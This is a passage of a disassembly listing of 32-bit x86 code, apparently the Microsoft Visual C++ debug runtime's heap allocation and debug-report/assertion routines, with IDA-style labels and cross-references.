cmp [ebp+arg_4], 0
jnz short loc_41BDCD
loc_41BDC8: ; CODE XREF: sub_41BD90+30�j
mov eax, [ebp+var_4]
jmp short loc_41BDE3
; ---------------------------------------------------------------------------
loc_41BDCD: ; CODE XREF: sub_41BD90+36�j
mov ecx, [ebp+arg_0]
push ecx
call sub_41BB80
add esp, 4
test eax, eax
jnz short loc_41BDE1
xor eax, eax
jmp short loc_41BDE3
; ---------------------------------------------------------------------------
loc_41BDE1: ; CODE XREF: sub_41BD90+4B�j
jmp short loc_41BD9E
; ---------------------------------------------------------------------------
loc_41BDE3: ; CODE XREF: sub_41BD90+C�j
; sub_41BD90+3B�j ...
mov esp, ebp
pop ebp
retn
sub_41BD90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BDF0 proc near ; CODE XREF: sub_416B00+19D�p
; sub_41BD90+18�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
cmp eax, dword_442D48
ja short loc_41BE2D
push 9
call sub_41BC90
add esp, 4
mov ecx, [ebp+arg_0]
push ecx
call sub_41D1D0
add esp, 4
mov [ebp+var_4], eax
push 9
call sub_41BD30
add esp, 4
cmp [ebp+var_4], 0
jz short loc_41BE2D
mov eax, [ebp+var_4]
jmp short loc_41BE59
; ---------------------------------------------------------------------------
loc_41BE2D: ; CODE XREF: sub_41BDF0+D�j
; sub_41BDF0+36�j
cmp [ebp+arg_0], 0
jnz short loc_41BE3A
mov [ebp+arg_0], 1
loc_41BE3A: ; CODE XREF: sub_41BDF0+41�j
mov edx, [ebp+arg_0]
add edx, 0Fh
and edx, 0FFFFFFF0h
mov [ebp+arg_0], edx
mov eax, [ebp+arg_0]
push eax
push 0
mov ecx, dword_49377C
push ecx
call ds:dword_494354
loc_41BE59: ; CODE XREF: sub_41BDF0+3B�j
mov esp, ebp
pop ebp
retn
sub_41BDF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BE60 proc near ; CODE XREF: sub_416B00+79�p
; sub_416F00+C1�p ...
push ebp
mov ebp, esp
mov eax, 1
pop ebp
retn
sub_41BE60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BE70 proc near ; CODE XREF: sub_41BF80+113�p
; sub_41C310+33�p
push ebp
mov ebp, esp
call ds:dword_494438
pop ebp
retn
sub_41BE70 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
cmp dword ptr [ebp+8], 0
jl short loc_41BE90
cmp dword ptr [ebp+8], 3
jl short loc_41BE95
loc_41BE90: ; CODE XREF: .text:0041BE88�j
or eax, 0FFFFFFFFh
jmp short loc_41BED3
; ---------------------------------------------------------------------------
loc_41BE95: ; CODE XREF: .text:0041BE8E�j
cmp dword ptr [ebp+0Ch], 0FFFFFFFFh
jnz short loc_41BEA7
mov eax, [ebp+8]
mov eax, dword_442D20[eax*4]
jmp short loc_41BED3
; ---------------------------------------------------------------------------
loc_41BEA7: ; CODE XREF: .text:0041BE99�j
mov ecx, [ebp+0Ch]
and ecx, 0FFFFFFF8h
test ecx, ecx
jz short loc_41BEB6
or eax, 0FFFFFFFFh
jmp short loc_41BED3
; ---------------------------------------------------------------------------
loc_41BEB6: ; CODE XREF: .text:0041BEAF�j
mov edx, [ebp+8]
mov eax, dword_442D20[edx*4]
mov [ebp-4], eax
mov ecx, [ebp+8]
mov edx, [ebp+0Ch]
mov dword_442D20[ecx*4], edx
mov eax, [ebp-4]
loc_41BED3: ; CODE XREF: .text:0041BE93�j
; .text:0041BEA5�j ...
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
cmp dword ptr [ebp+8], 0
jl short loc_41BEF0
cmp dword ptr [ebp+8], 3
jl short loc_41BEF7
loc_41BEF0: ; CODE XREF: .text:0041BEE8�j
mov eax, 0FFFFFFFEh
jmp short loc_41BF5A
; ---------------------------------------------------------------------------
loc_41BEF7: ; CODE XREF: .text:0041BEEE�j
cmp dword ptr [ebp+0Ch], 0FFFFFFFAh
jnz short loc_41BF09
mov eax, [ebp+8]
mov eax, dword_442D2C[eax*4]
jmp short loc_41BF5A
; ---------------------------------------------------------------------------
loc_41BF09: ; CODE XREF: .text:0041BEFB�j
mov ecx, [ebp+8]
mov edx, dword_442D2C[ecx*4]
mov [ebp-4], edx
cmp dword ptr [ebp+0Ch], 0FFFFFFFCh
jnz short loc_41BF30
push 0FFFFFFF5h
call ds:dword_49443C
mov ecx, [ebp+8]
mov dword_442D2C[ecx*4], eax
jmp short loc_41BF57
; ---------------------------------------------------------------------------
loc_41BF30: ; CODE XREF: .text:0041BF1A�j
cmp dword ptr [ebp+0Ch], 0FFFFFFFBh
jnz short loc_41BF4A
push 0FFFFFFF4h
call ds:dword_49443C
mov edx, [ebp+8]
mov dword_442D2C[edx*4], eax
jmp short loc_41BF57
; ---------------------------------------------------------------------------
loc_41BF4A: ; CODE XREF: .text:0041BF34�j
mov eax, [ebp+8]
mov ecx, [ebp+0Ch]
mov dword_442D2C[eax*4], ecx
loc_41BF57: ; CODE XREF: .text:0041BF2E�j
; .text:0041BF48�j
mov eax, [ebp-4]
loc_41BF5A: ; CODE XREF: .text:0041BEF5�j
; .text:0041BF07�j
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
mov eax, dword_493780
mov [ebp-4], eax
mov ecx, [ebp+8]
mov dword_493780, ecx
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BF80 proc near ; CODE XREF: sub_416B00+38�p
; sub_416B00+A1�p ...
var_302C = dword ptr -302Ch
var_3028 = dword ptr -3028h
var_3024 = byte ptr -3024h
var_3010 = byte ptr -3010h
var_300C = dword ptr -300Ch
var_3008 = byte ptr -3008h
var_3007 = byte ptr -3007h
var_2008 = byte ptr -2008h
var_2007 = byte ptr -2007h
var_1008 = dword ptr -1008h
var_1004 = dword ptr -1004h
var_1000 = byte ptr -1000h
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = byte ptr 1Ch
push ebp
mov ebp, esp
mov eax, 302Ch
call sub_418D40
push edi
mov [ebp+var_3008], 0
mov ecx, 3FFh
xor eax, eax
lea edi, [ebp+var_3007]
rep stosd
stosw
stosb
mov [ebp+var_2008], 0
mov ecx, 3FFh
xor eax, eax
lea edi, [ebp+var_2007]
rep stosd
stosw
stosb
mov [ebp+var_1000], 0
mov ecx, 3FFh
xor eax, eax
lea edi, [ebp+var_FFF]
rep stosd
stosw
stosb
lea eax, [ebp+arg_14]
mov [ebp+var_1004], eax
cmp [ebp+arg_0], 0
jl short loc_41BFEE
cmp [ebp+arg_0], 3
jl short loc_41BFF6
loc_41BFEE: ; CODE XREF: sub_41BF80+66�j
or eax, 0FFFFFFFFh
jmp loc_41C30B
; ---------------------------------------------------------------------------
loc_41BFF6: ; CODE XREF: sub_41BF80+6C�j
cmp [ebp+arg_0], 2
jnz loc_41C0A0
push offset dword_442D1C
call ds:dword_494418
test eax, eax
jle loc_41C0A0
cmp dword_492150, 0
jnz short loc_41C05E
push offset aUser32_dll_0 ; "user32.dll"
call ds:dword_49434C
mov [ebp+var_300C], eax
cmp [ebp+var_300C], 0
jz short loc_41C056
push offset aWsprintfa ; "wsprintfA"
mov ecx, [ebp+var_300C]
push ecx
call ds:dword_494348
mov dword_492150, eax
cmp dword_492150, 0
jnz short loc_41C05E
loc_41C056: ; CODE XREF: sub_41BF80+B4�j
or eax, 0FFFFFFFFh
jmp loc_41C30B
; ---------------------------------------------------------------------------
loc_41C05E: ; CODE XREF: sub_41BF80+9A�j
; sub_41BF80+D4�j
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
push offset aSecondChanceAs ; "Second Chance Assertion Failed: File %s"...
lea ecx, [ebp+var_2008]
push ecx
call dword_492150
add esp, 10h
lea edx, [ebp+var_2008]
push edx
call ds:dword_494440
push offset dword_442D1C
call ds:dword_494414
call sub_41BE70
or eax, 0FFFFFFFFh
jmp loc_41C30B
; ---------------------------------------------------------------------------
loc_41C0A0: ; CODE XREF: sub_41BF80+7A�j
; sub_41BF80+8D�j
cmp [ebp+arg_10], 0
jz short loc_41C0DD
mov eax, [ebp+var_1004]
push eax
mov ecx, [ebp+arg_10]
push ecx
push 0FEDh
lea edx, [ebp+var_1000]
push edx
call sub_4193F0
add esp, 10h
test eax, eax
jge short loc_41C0DD
push offset a_crtdbgreportS ; "_CrtDbgReport: String too long or IO Er"...
lea eax, [ebp+var_1000]
push eax
call sub_419FA0
add esp, 8
loc_41C0DD: ; CODE XREF: sub_41BF80+124�j
; sub_41BF80+147�j
cmp [ebp+arg_0], 2
jnz short loc_41C115
cmp [ebp+arg_10], 0
jz short loc_41C0F5
mov [ebp+var_3028], offset aAssertionFaile ; "Assertion failed: "
jmp short loc_41C0FF
; ---------------------------------------------------------------------------
loc_41C0F5: ; CODE XREF: sub_41BF80+167�j
mov [ebp+var_3028], offset aAssertionFai_0 ; "Assertion failed!"
loc_41C0FF: ; CODE XREF: sub_41BF80+173�j
mov ecx, [ebp+var_3028]
push ecx
lea edx, [ebp+var_3008]
push edx
call sub_419FA0
add esp, 8
loc_41C115: ; CODE XREF: sub_41BF80+161�j
lea eax, [ebp+var_1000]
push eax
lea ecx, [ebp+var_3008]
push ecx
call sub_419FB0
add esp, 8
cmp [ebp+arg_0], 2
jnz short loc_41C16A
mov edx, [ebp+arg_0]
mov eax, dword_442D20[edx*4]
and eax, 1
test eax, eax
jz short loc_41C156
push offset asc_432C98 ; "\r"
lea ecx, [ebp+var_3008]
push ecx
call sub_419FB0
add esp, 8
loc_41C156: ; CODE XREF: sub_41BF80+1C0�j
push offset asc_432C94 ; "\n"
lea edx, [ebp+var_3008]
push edx
call sub_419FB0
add esp, 8
loc_41C16A: ; CODE XREF: sub_41BF80+1AF�j
cmp [ebp+arg_4], 0
jz short loc_41C1B2
lea eax, [ebp+var_3008]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
push offset aSDS_0 ; "%s(%d) : %s"
push 1000h
lea eax, [ebp+var_2008]
push eax
call sub_418EF0
add esp, 18h
test eax, eax
jge short loc_41C1B0
push offset a_crtdbgreportS ; "_CrtDbgReport: String too long or IO Er"...
lea ecx, [ebp+var_2008]
push ecx
call sub_419FA0
add esp, 8
loc_41C1B0: ; CODE XREF: sub_41BF80+21A�j
jmp short loc_41C1C8
; ---------------------------------------------------------------------------
loc_41C1B2: ; CODE XREF: sub_41BF80+1EE�j
lea edx, [ebp+var_3008]
push edx
lea eax, [ebp+var_2008]
push eax
call sub_419FA0
add esp, 8
loc_41C1C8: ; CODE XREF: sub_41BF80:loc_41C1B0�j
cmp dword_493780, 0
jz short loc_41C20C
lea ecx, [ebp+var_1008]
push ecx
lea edx, [ebp+var_2008]
push edx
mov eax, [ebp+arg_0]
push eax
call dword_493780
add esp, 0Ch
test eax, eax
jz short loc_41C20C
cmp [ebp+arg_0], 2
jnz short loc_41C201
push offset dword_442D1C
call ds:dword_494414
loc_41C201: ; CODE XREF: sub_41BF80+274�j
mov eax, [ebp+var_1008]
jmp loc_41C30B
; ---------------------------------------------------------------------------
loc_41C20C: ; CODE XREF: sub_41BF80+24F�j
; sub_41BF80+26E�j
mov ecx, [ebp+arg_0]
mov edx, dword_442D20[ecx*4]
and edx, 1
test edx, edx
jz short loc_41C25B
mov eax, [ebp+arg_0]
cmp dword_442D2C[eax*4], 0FFFFFFFFh
jz short loc_41C25B
push 0
lea ecx, [ebp+var_3010]
push ecx
lea edx, [ebp+var_2008]
push edx
call sub_418E70
add esp, 4
push eax
lea eax, [ebp+var_2008]
push eax
mov ecx, [ebp+arg_0]
mov edx, dword_442D2C[ecx*4]
push edx
call ds:dword_4942E4
loc_41C25B: ; CODE XREF: sub_41BF80+29B�j
; sub_41BF80+2A8�j
mov eax, [ebp+arg_0]
mov ecx, dword_442D20[eax*4]
and ecx, 2
test ecx, ecx
jz short loc_41C279
lea edx, [ebp+var_2008]
push edx
call ds:dword_494440
loc_41C279: ; CODE XREF: sub_41BF80+2EA�j
mov eax, [ebp+arg_0]
mov ecx, dword_442D20[eax*4]
and ecx, 4
test ecx, ecx
jz short loc_41C2F8
cmp [ebp+arg_8], 0
jz short loc_41C2AD
push 0Ah
lea edx, [ebp+var_3024]
push edx
mov eax, [ebp+arg_8]
push eax
call sub_4262C0
add esp, 0Ch
mov [ebp+var_302C], eax
jmp short loc_41C2B7
; ---------------------------------------------------------------------------
loc_41C2AD: ; CODE XREF: sub_41BF80+30E�j
mov [ebp+var_302C], 0
loc_41C2B7: ; CODE XREF: sub_41BF80+32B�j
lea ecx, [ebp+var_1000]
push ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+var_302C]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_41C310
add esp, 14h
mov [ebp+var_1008], eax
cmp [ebp+arg_0], 2
jnz short loc_41C2F0
push offset dword_442D1C
call ds:dword_494414
loc_41C2F0: ; CODE XREF: sub_41BF80+363�j
mov eax, [ebp+var_1008]
jmp short loc_41C30B
; ---------------------------------------------------------------------------
loc_41C2F8: ; CODE XREF: sub_41BF80+308�j
cmp [ebp+arg_0], 2
jnz short loc_41C309
push offset dword_442D1C
call ds:dword_494414
loc_41C309: ; CODE XREF: sub_41BF80+37C�j
xor eax, eax
loc_41C30B: ; CODE XREF: sub_41BF80+71�j
; sub_41BF80+D9�j ...
pop edi
mov esp, ebp
pop ebp
retn
sub_41BF80 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C310 proc near ; CODE XREF: sub_41BF80+351�p
var_1138 = dword ptr -1138h
var_1134 = dword ptr -1134h
var_1130 = dword ptr -1130h
var_112C = dword ptr -112Ch
var_1128 = dword ptr -1128h
var_1124 = dword ptr -1124h
var_1120 = dword ptr -1120h
var_111C = dword ptr -111Ch
var_1118 = dword ptr -1118h
var_1114 = dword ptr -1114h
var_1110 = dword ptr -1110h
var_110C = byte ptr -110Ch
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov eax, 1138h
call sub_418D40
loc_41C31D: ; CODE XREF: sub_41C310+3C�j
cmp [ebp+arg_10], 0
jnz short loc_41C348
push offset aSzusermessageN ; "szUserMessage != NULL"
push 0
push 1DAh
push offset aDbgrpt_c ; "dbgrpt.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_41C348
call sub_41BE70
loc_41C348: ; CODE XREF: sub_41C310+11�j
; sub_41C310+31�j
xor eax, eax
test eax, eax
jnz short loc_41C31D
push 104h
lea ecx, [ebp+var_108]
push ecx
push 0
call ds:dword_4942F8
test eax, eax
jnz short loc_41C37A
push offset aProgramNameUnk ; "<program name unknown>"
lea edx, [ebp+var_108]
push edx
call sub_419FA0
add esp, 8
loc_41C37A: ; CODE XREF: sub_41C310+54�j
lea eax, [ebp+var_108]
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
push ecx
call sub_418E70
add esp, 4
cmp eax, 40h
jbe short loc_41C3BD
mov edx, [ebp+var_4]
push edx
call sub_418E70
add esp, 4
mov ecx, [ebp+var_4]
lea edx, [ecx+eax-40h]
mov [ebp+var_4], edx
push 3
push offset a___ ; "..."
mov eax, [ebp+var_4]
push eax
call sub_4191A0
add esp, 0Ch
loc_41C3BD: ; CODE XREF: sub_41C310+82�j
mov ecx, [ebp+arg_C]
mov [ebp+var_1110], ecx
cmp [ebp+var_1110], 0
jz short loc_41C418
mov edx, [ebp+var_1110]
push edx
call sub_418E70
add esp, 4
cmp eax, 40h
jbe short loc_41C418
mov eax, [ebp+var_1110]
push eax
call sub_418E70
add esp, 4
mov ecx, [ebp+var_1110]
lea edx, [ecx+eax-40h]
mov [ebp+var_1110], edx
push 3
push offset a___ ; "..."
mov eax, [ebp+var_1110]
push eax
call sub_4191A0
add esp, 0Ch
loc_41C418: ; CODE XREF: sub_41C310+BD�j
; sub_41C310+D1�j
cmp [ebp+arg_0], 2
jnz short loc_41C42A
mov [ebp+var_1114], offset aForInformation ; "\n\nFor information on how your program c"...
jmp short loc_41C434
; ---------------------------------------------------------------------------
loc_41C42A: ; CODE XREF: sub_41C310+10C�j
mov [ebp+var_1114], offset dword_432DE4
loc_41C434: ; CODE XREF: sub_41C310+118�j
mov ecx, [ebp+arg_10]
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_41C449
mov eax, [ebp+arg_10]
mov [ebp+var_1118], eax
jmp short loc_41C453
; ---------------------------------------------------------------------------
loc_41C449: ; CODE XREF: sub_41C310+12C�j
mov [ebp+var_1118], offset dword_432DE4
loc_41C453: ; CODE XREF: sub_41C310+137�j
mov ecx, [ebp+arg_10]
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_41C46F
cmp [ebp+arg_0], 2
jnz short loc_41C46F
mov [ebp+var_111C], offset aExpression ; "Expression: "
jmp short loc_41C479
; ---------------------------------------------------------------------------
loc_41C46F: ; CODE XREF: sub_41C310+14B�j
; sub_41C310+151�j
mov [ebp+var_111C], offset dword_432DE4
loc_41C479: ; CODE XREF: sub_41C310+15D�j
mov eax, [ebp+arg_10]
movsx ecx, byte ptr [eax]
test ecx, ecx
jz short loc_41C48F
mov [ebp+var_1120], offset asc_432DD0 ; "\n\n"
jmp short loc_41C499
; ---------------------------------------------------------------------------
loc_41C48F: ; CODE XREF: sub_41C310+171�j
mov [ebp+var_1120], offset dword_432DE4
loc_41C499: ; CODE XREF: sub_41C310+17D�j
cmp [ebp+arg_8], 0
jz short loc_41C4AA
mov edx, [ebp+arg_8]
mov [ebp+var_1124], edx
jmp short loc_41C4B4
; ---------------------------------------------------------------------------
loc_41C4AA: ; CODE XREF: sub_41C310+18D�j
mov [ebp+var_1124], offset dword_432DE4
loc_41C4B4: ; CODE XREF: sub_41C310+198�j
cmp [ebp+arg_8], 0
jz short loc_41C4C6
mov [ebp+var_1128], offset aLine ; "\nLine: "
jmp short loc_41C4D0
; ---------------------------------------------------------------------------
loc_41C4C6: ; CODE XREF: sub_41C310+1A8�j
mov [ebp+var_1128], offset dword_432DE4
loc_41C4D0: ; CODE XREF: sub_41C310+1B4�j
cmp [ebp+arg_4], 0
jz short loc_41C4E1
mov eax, [ebp+arg_4]
mov [ebp+var_112C], eax
jmp short loc_41C4EB
; ---------------------------------------------------------------------------
loc_41C4E1: ; CODE XREF: sub_41C310+1C4�j
mov [ebp+var_112C], offset dword_432DE4
loc_41C4EB: ; CODE XREF: sub_41C310+1CF�j
cmp [ebp+arg_4], 0
jz short loc_41C4FD
mov [ebp+var_1130], offset aFile_3 ; "\nFile: "
jmp short loc_41C507
; ---------------------------------------------------------------------------
loc_41C4FD: ; CODE XREF: sub_41C310+1DF�j
mov [ebp+var_1130], offset dword_432DE4
loc_41C507: ; CODE XREF: sub_41C310+1EB�j
cmp [ebp+var_1110], 0
jz short loc_41C51E
mov ecx, [ebp+var_1110]
mov [ebp+var_1134], ecx
jmp short loc_41C528
; ---------------------------------------------------------------------------
loc_41C51E: ; CODE XREF: sub_41C310+1FE�j
mov [ebp+var_1134], offset dword_432DE4
loc_41C528: ; CODE XREF: sub_41C310+20C�j
cmp [ebp+var_1110], 0
jz short loc_41C53D
mov [ebp+var_1138], offset aModule ; "\nModule: "
jmp short loc_41C547
; ---------------------------------------------------------------------------
loc_41C53D: ; CODE XREF: sub_41C310+21F�j
mov [ebp+var_1138], offset dword_432DE4
loc_41C547: ; CODE XREF: sub_41C310+22B�j
mov edx, [ebp+var_1114]
push edx
mov eax, [ebp+var_1118]
push eax
mov ecx, [ebp+var_111C]
push ecx
mov edx, [ebp+var_1120]
push edx
mov eax, [ebp+var_1124]
push eax
mov ecx, [ebp+var_1128]
push ecx
mov edx, [ebp+var_112C]
push edx
mov eax, [ebp+var_1130]
push eax
mov ecx, [ebp+var_1134]
push ecx
mov edx, [ebp+var_1138]
push edx
mov eax, [ebp+var_4]
push eax
mov ecx, [ebp+arg_0]
mov edx, off_442D38[ecx*4]
push edx
push offset aDebugSProgramS ; "Debug %s!\n\nProgram: %s%s%s%s%s%s%s%s%s%"...
push 1000h
lea eax, [ebp+var_110C]
push eax
call sub_418EF0
add esp, 3Ch
test eax, eax
jge short loc_41C5CD
push offset a_crtdbgreportS ; "_CrtDbgReport: String too long or IO Er"...
lea ecx, [ebp+var_110C]
push ecx
call sub_419FA0
add esp, 8
loc_41C5CD: ; CODE XREF: sub_41C310+2A7�j
push 12012h
push offset aMicrosoftVisua ; "Microsoft Visual C++ Debug Library"
lea edx, [ebp+var_110C]
push edx
call sub_426B40
add esp, 0Ch
mov [ebp+var_10C], eax
cmp [ebp+var_10C], 3
jnz short loc_41C606
push 16h
call sub_426880
add esp, 4
push 3
call sub_41B330
loc_41C606: ; CODE XREF: sub_41C310+2E3�j
cmp [ebp+var_10C], 4
jnz short loc_41C616
mov eax, 1
jmp short loc_41C618
; ---------------------------------------------------------------------------
loc_41C616: ; CODE XREF: sub_41C310+2FD�j
xor eax, eax
loc_41C618: ; CODE XREF: sub_41C310+304�j
mov esp, ebp
pop ebp
retn
sub_41C310 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C620 proc near ; CODE XREF: sub_416F00+2D4�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 8
cmp [ebp+arg_4], 0FFFFFFE0h
jbe short loc_41C633
xor eax, eax
jmp loc_41C6C9
; ---------------------------------------------------------------------------
loc_41C633: ; CODE XREF: sub_41C620+A�j
push 9
call sub_41BC90
add esp, 4
mov eax, [ebp+arg_0]
push eax
call sub_41CB40
add esp, 4
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_41C691
mov [ebp+var_4], 0
mov ecx, [ebp+arg_4]
cmp ecx, dword_442D48
ja short loc_41C682
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_8]
push ecx
call sub_41DA10
add esp, 0Ch
test eax, eax
jz short loc_41C682
mov edx, [ebp+arg_0]
mov [ebp+var_4], edx
loc_41C682: ; CODE XREF: sub_41C620+42�j
; sub_41C620+5A�j
push 9
call sub_41BD30
add esp, 4
mov eax, [ebp+var_4]
jmp short loc_41C6C9
; ---------------------------------------------------------------------------
loc_41C691: ; CODE XREF: sub_41C620+30�j
push 9
call sub_41BD30
add esp, 4
cmp [ebp+arg_4], 0
jnz short loc_41C6A8
mov [ebp+arg_4], 1
loc_41C6A8: ; CODE XREF: sub_41C620+7F�j
mov eax, [ebp+arg_4]
add eax, 0Fh
and al, 0F0h
mov [ebp+arg_4], eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
push 10h
mov eax, dword_49377C
push eax
call ds:dword_494444
loc_41C6C9: ; CODE XREF: sub_41C620+E�j
; sub_41C620+6F�j
mov esp, ebp
pop ebp
retn
sub_41C620 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C6D0 proc near ; CODE XREF: sub_416F00+2AF�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
cmp [ebp+arg_0], 0
jnz short loc_41C6ED
mov eax, [ebp+arg_4]
push eax
call sub_41BD70
add esp, 4
jmp loc_41C8B6
; ---------------------------------------------------------------------------
loc_41C6ED: ; CODE XREF: sub_41C6D0+A�j
cmp [ebp+arg_4], 0
jnz short loc_41C706
mov ecx, [ebp+arg_0]
push ecx
call sub_41C8C0
add esp, 4
xor eax, eax
jmp loc_41C8B6
; ---------------------------------------------------------------------------
loc_41C706: ; CODE XREF: sub_41C6D0+21�j
; sub_41C6D0:loc_41C8B1�j
mov [ebp+var_8], 0
cmp [ebp+arg_4], 0FFFFFFE0h
ja loc_41C889
push 9
call sub_41BC90
add esp, 4
mov edx, [ebp+arg_0]
push edx
call sub_41CB40
add esp, 4
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz loc_41C84C
mov eax, [ebp+arg_4]
cmp eax, dword_442D48
ja short loc_41C7C0
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
mov eax, [ebp+var_C]
push eax
call sub_41DA10
add esp, 0Ch
test eax, eax
jz short loc_41C765
mov ecx, [ebp+arg_0]
mov [ebp+var_8], ecx
jmp short loc_41C7C0
; ---------------------------------------------------------------------------
loc_41C765: ; CODE XREF: sub_41C6D0+8B�j
mov edx, [ebp+arg_4]
push edx
call sub_41D1D0
add esp, 4
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_41C7C0
mov eax, [ebp+arg_0]
mov ecx, [eax-4]
sub ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
cmp edx, [ebp+arg_4]
jnb short loc_41C796
mov eax, [ebp+var_4]
mov [ebp+var_10], eax
jmp short loc_41C79C
; ---------------------------------------------------------------------------
loc_41C796: ; CODE XREF: sub_41C6D0+BC�j
mov ecx, [ebp+arg_4]
mov [ebp+var_10], ecx
loc_41C79C: ; CODE XREF: sub_41C6D0+C4�j
mov edx, [ebp+var_10]
push edx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_8]
push ecx
call sub_418A00
add esp, 0Ch
mov edx, [ebp+arg_0]
push edx
mov eax, [ebp+var_C]
push eax
call sub_41CC00
add esp, 8
loc_41C7C0: ; CODE XREF: sub_41C6D0+73�j
; sub_41C6D0+93�j ...
cmp [ebp+var_8], 0
jnz short loc_41C840
cmp [ebp+arg_4], 0
jnz short loc_41C7D3
mov [ebp+arg_4], 1
loc_41C7D3: ; CODE XREF: sub_41C6D0+FA�j
mov ecx, [ebp+arg_4]
add ecx, 0Fh
and ecx, 0FFFFFFF0h
mov [ebp+arg_4], ecx
mov edx, [ebp+arg_4]
push edx
push 0
mov eax, dword_49377C
push eax
call ds:dword_494354
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_41C840
mov ecx, [ebp+arg_0]
mov edx, [ecx-4]
sub edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jnb short loc_41C816
mov ecx, [ebp+var_4]
mov [ebp+var_14], ecx
jmp short loc_41C81C
; ---------------------------------------------------------------------------
loc_41C816: ; CODE XREF: sub_41C6D0+13C�j
mov edx, [ebp+arg_4]
mov [ebp+var_14], edx
loc_41C81C: ; CODE XREF: sub_41C6D0+144�j
mov eax, [ebp+var_14]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_8]
push edx
call sub_418A00
add esp, 0Ch
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_C]
push ecx
call sub_41CC00
add esp, 8
loc_41C840: ; CODE XREF: sub_41C6D0+F4�j
; sub_41C6D0+128�j
push 9
call sub_41BD30
add esp, 4
jmp short loc_41C889
; ---------------------------------------------------------------------------
loc_41C84C: ; CODE XREF: sub_41C6D0+64�j
push 9
call sub_41BD30
add esp, 4
cmp [ebp+arg_4], 0
jnz short loc_41C863
mov [ebp+arg_4], 1
loc_41C863: ; CODE XREF: sub_41C6D0+18A�j
mov edx, [ebp+arg_4]
add edx, 0Fh
and edx, 0FFFFFFF0h
mov [ebp+arg_4], edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
push 0
mov edx, dword_49377C
push edx
call ds:dword_494444
mov [ebp+var_8], eax
loc_41C889: ; CODE XREF: sub_41C6D0+41�j
; sub_41C6D0+17A�j
cmp [ebp+var_8], 0
jnz short loc_41C898
cmp dword_4920E4, 0
jnz short loc_41C89D
loc_41C898: ; CODE XREF: sub_41C6D0+1BD�j
mov eax, [ebp+var_8]
jmp short loc_41C8B6
; ---------------------------------------------------------------------------
loc_41C89D: ; CODE XREF: sub_41C6D0+1C6�j
mov eax, [ebp+arg_4]
push eax
call sub_41BB80
add esp, 4
test eax, eax
jnz short loc_41C8B1
xor eax, eax
jmp short loc_41C8B6
; ---------------------------------------------------------------------------
loc_41C8B1: ; CODE XREF: sub_41C6D0+1DB�j
jmp loc_41C706
; ---------------------------------------------------------------------------
loc_41C8B6: ; CODE XREF: sub_41C6D0+18�j
; sub_41C6D0+31�j ...
mov esp, ebp
pop ebp
retn
sub_41C6D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C8C0 proc near ; CODE XREF: sub_4174F0+26E�p
; sub_4174F0+3B2�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0
jnz short loc_41C8CC
jmp short loc_41C924
; ---------------------------------------------------------------------------
loc_41C8CC: ; CODE XREF: sub_41C8C0+8�j
push 9
call sub_41BC90
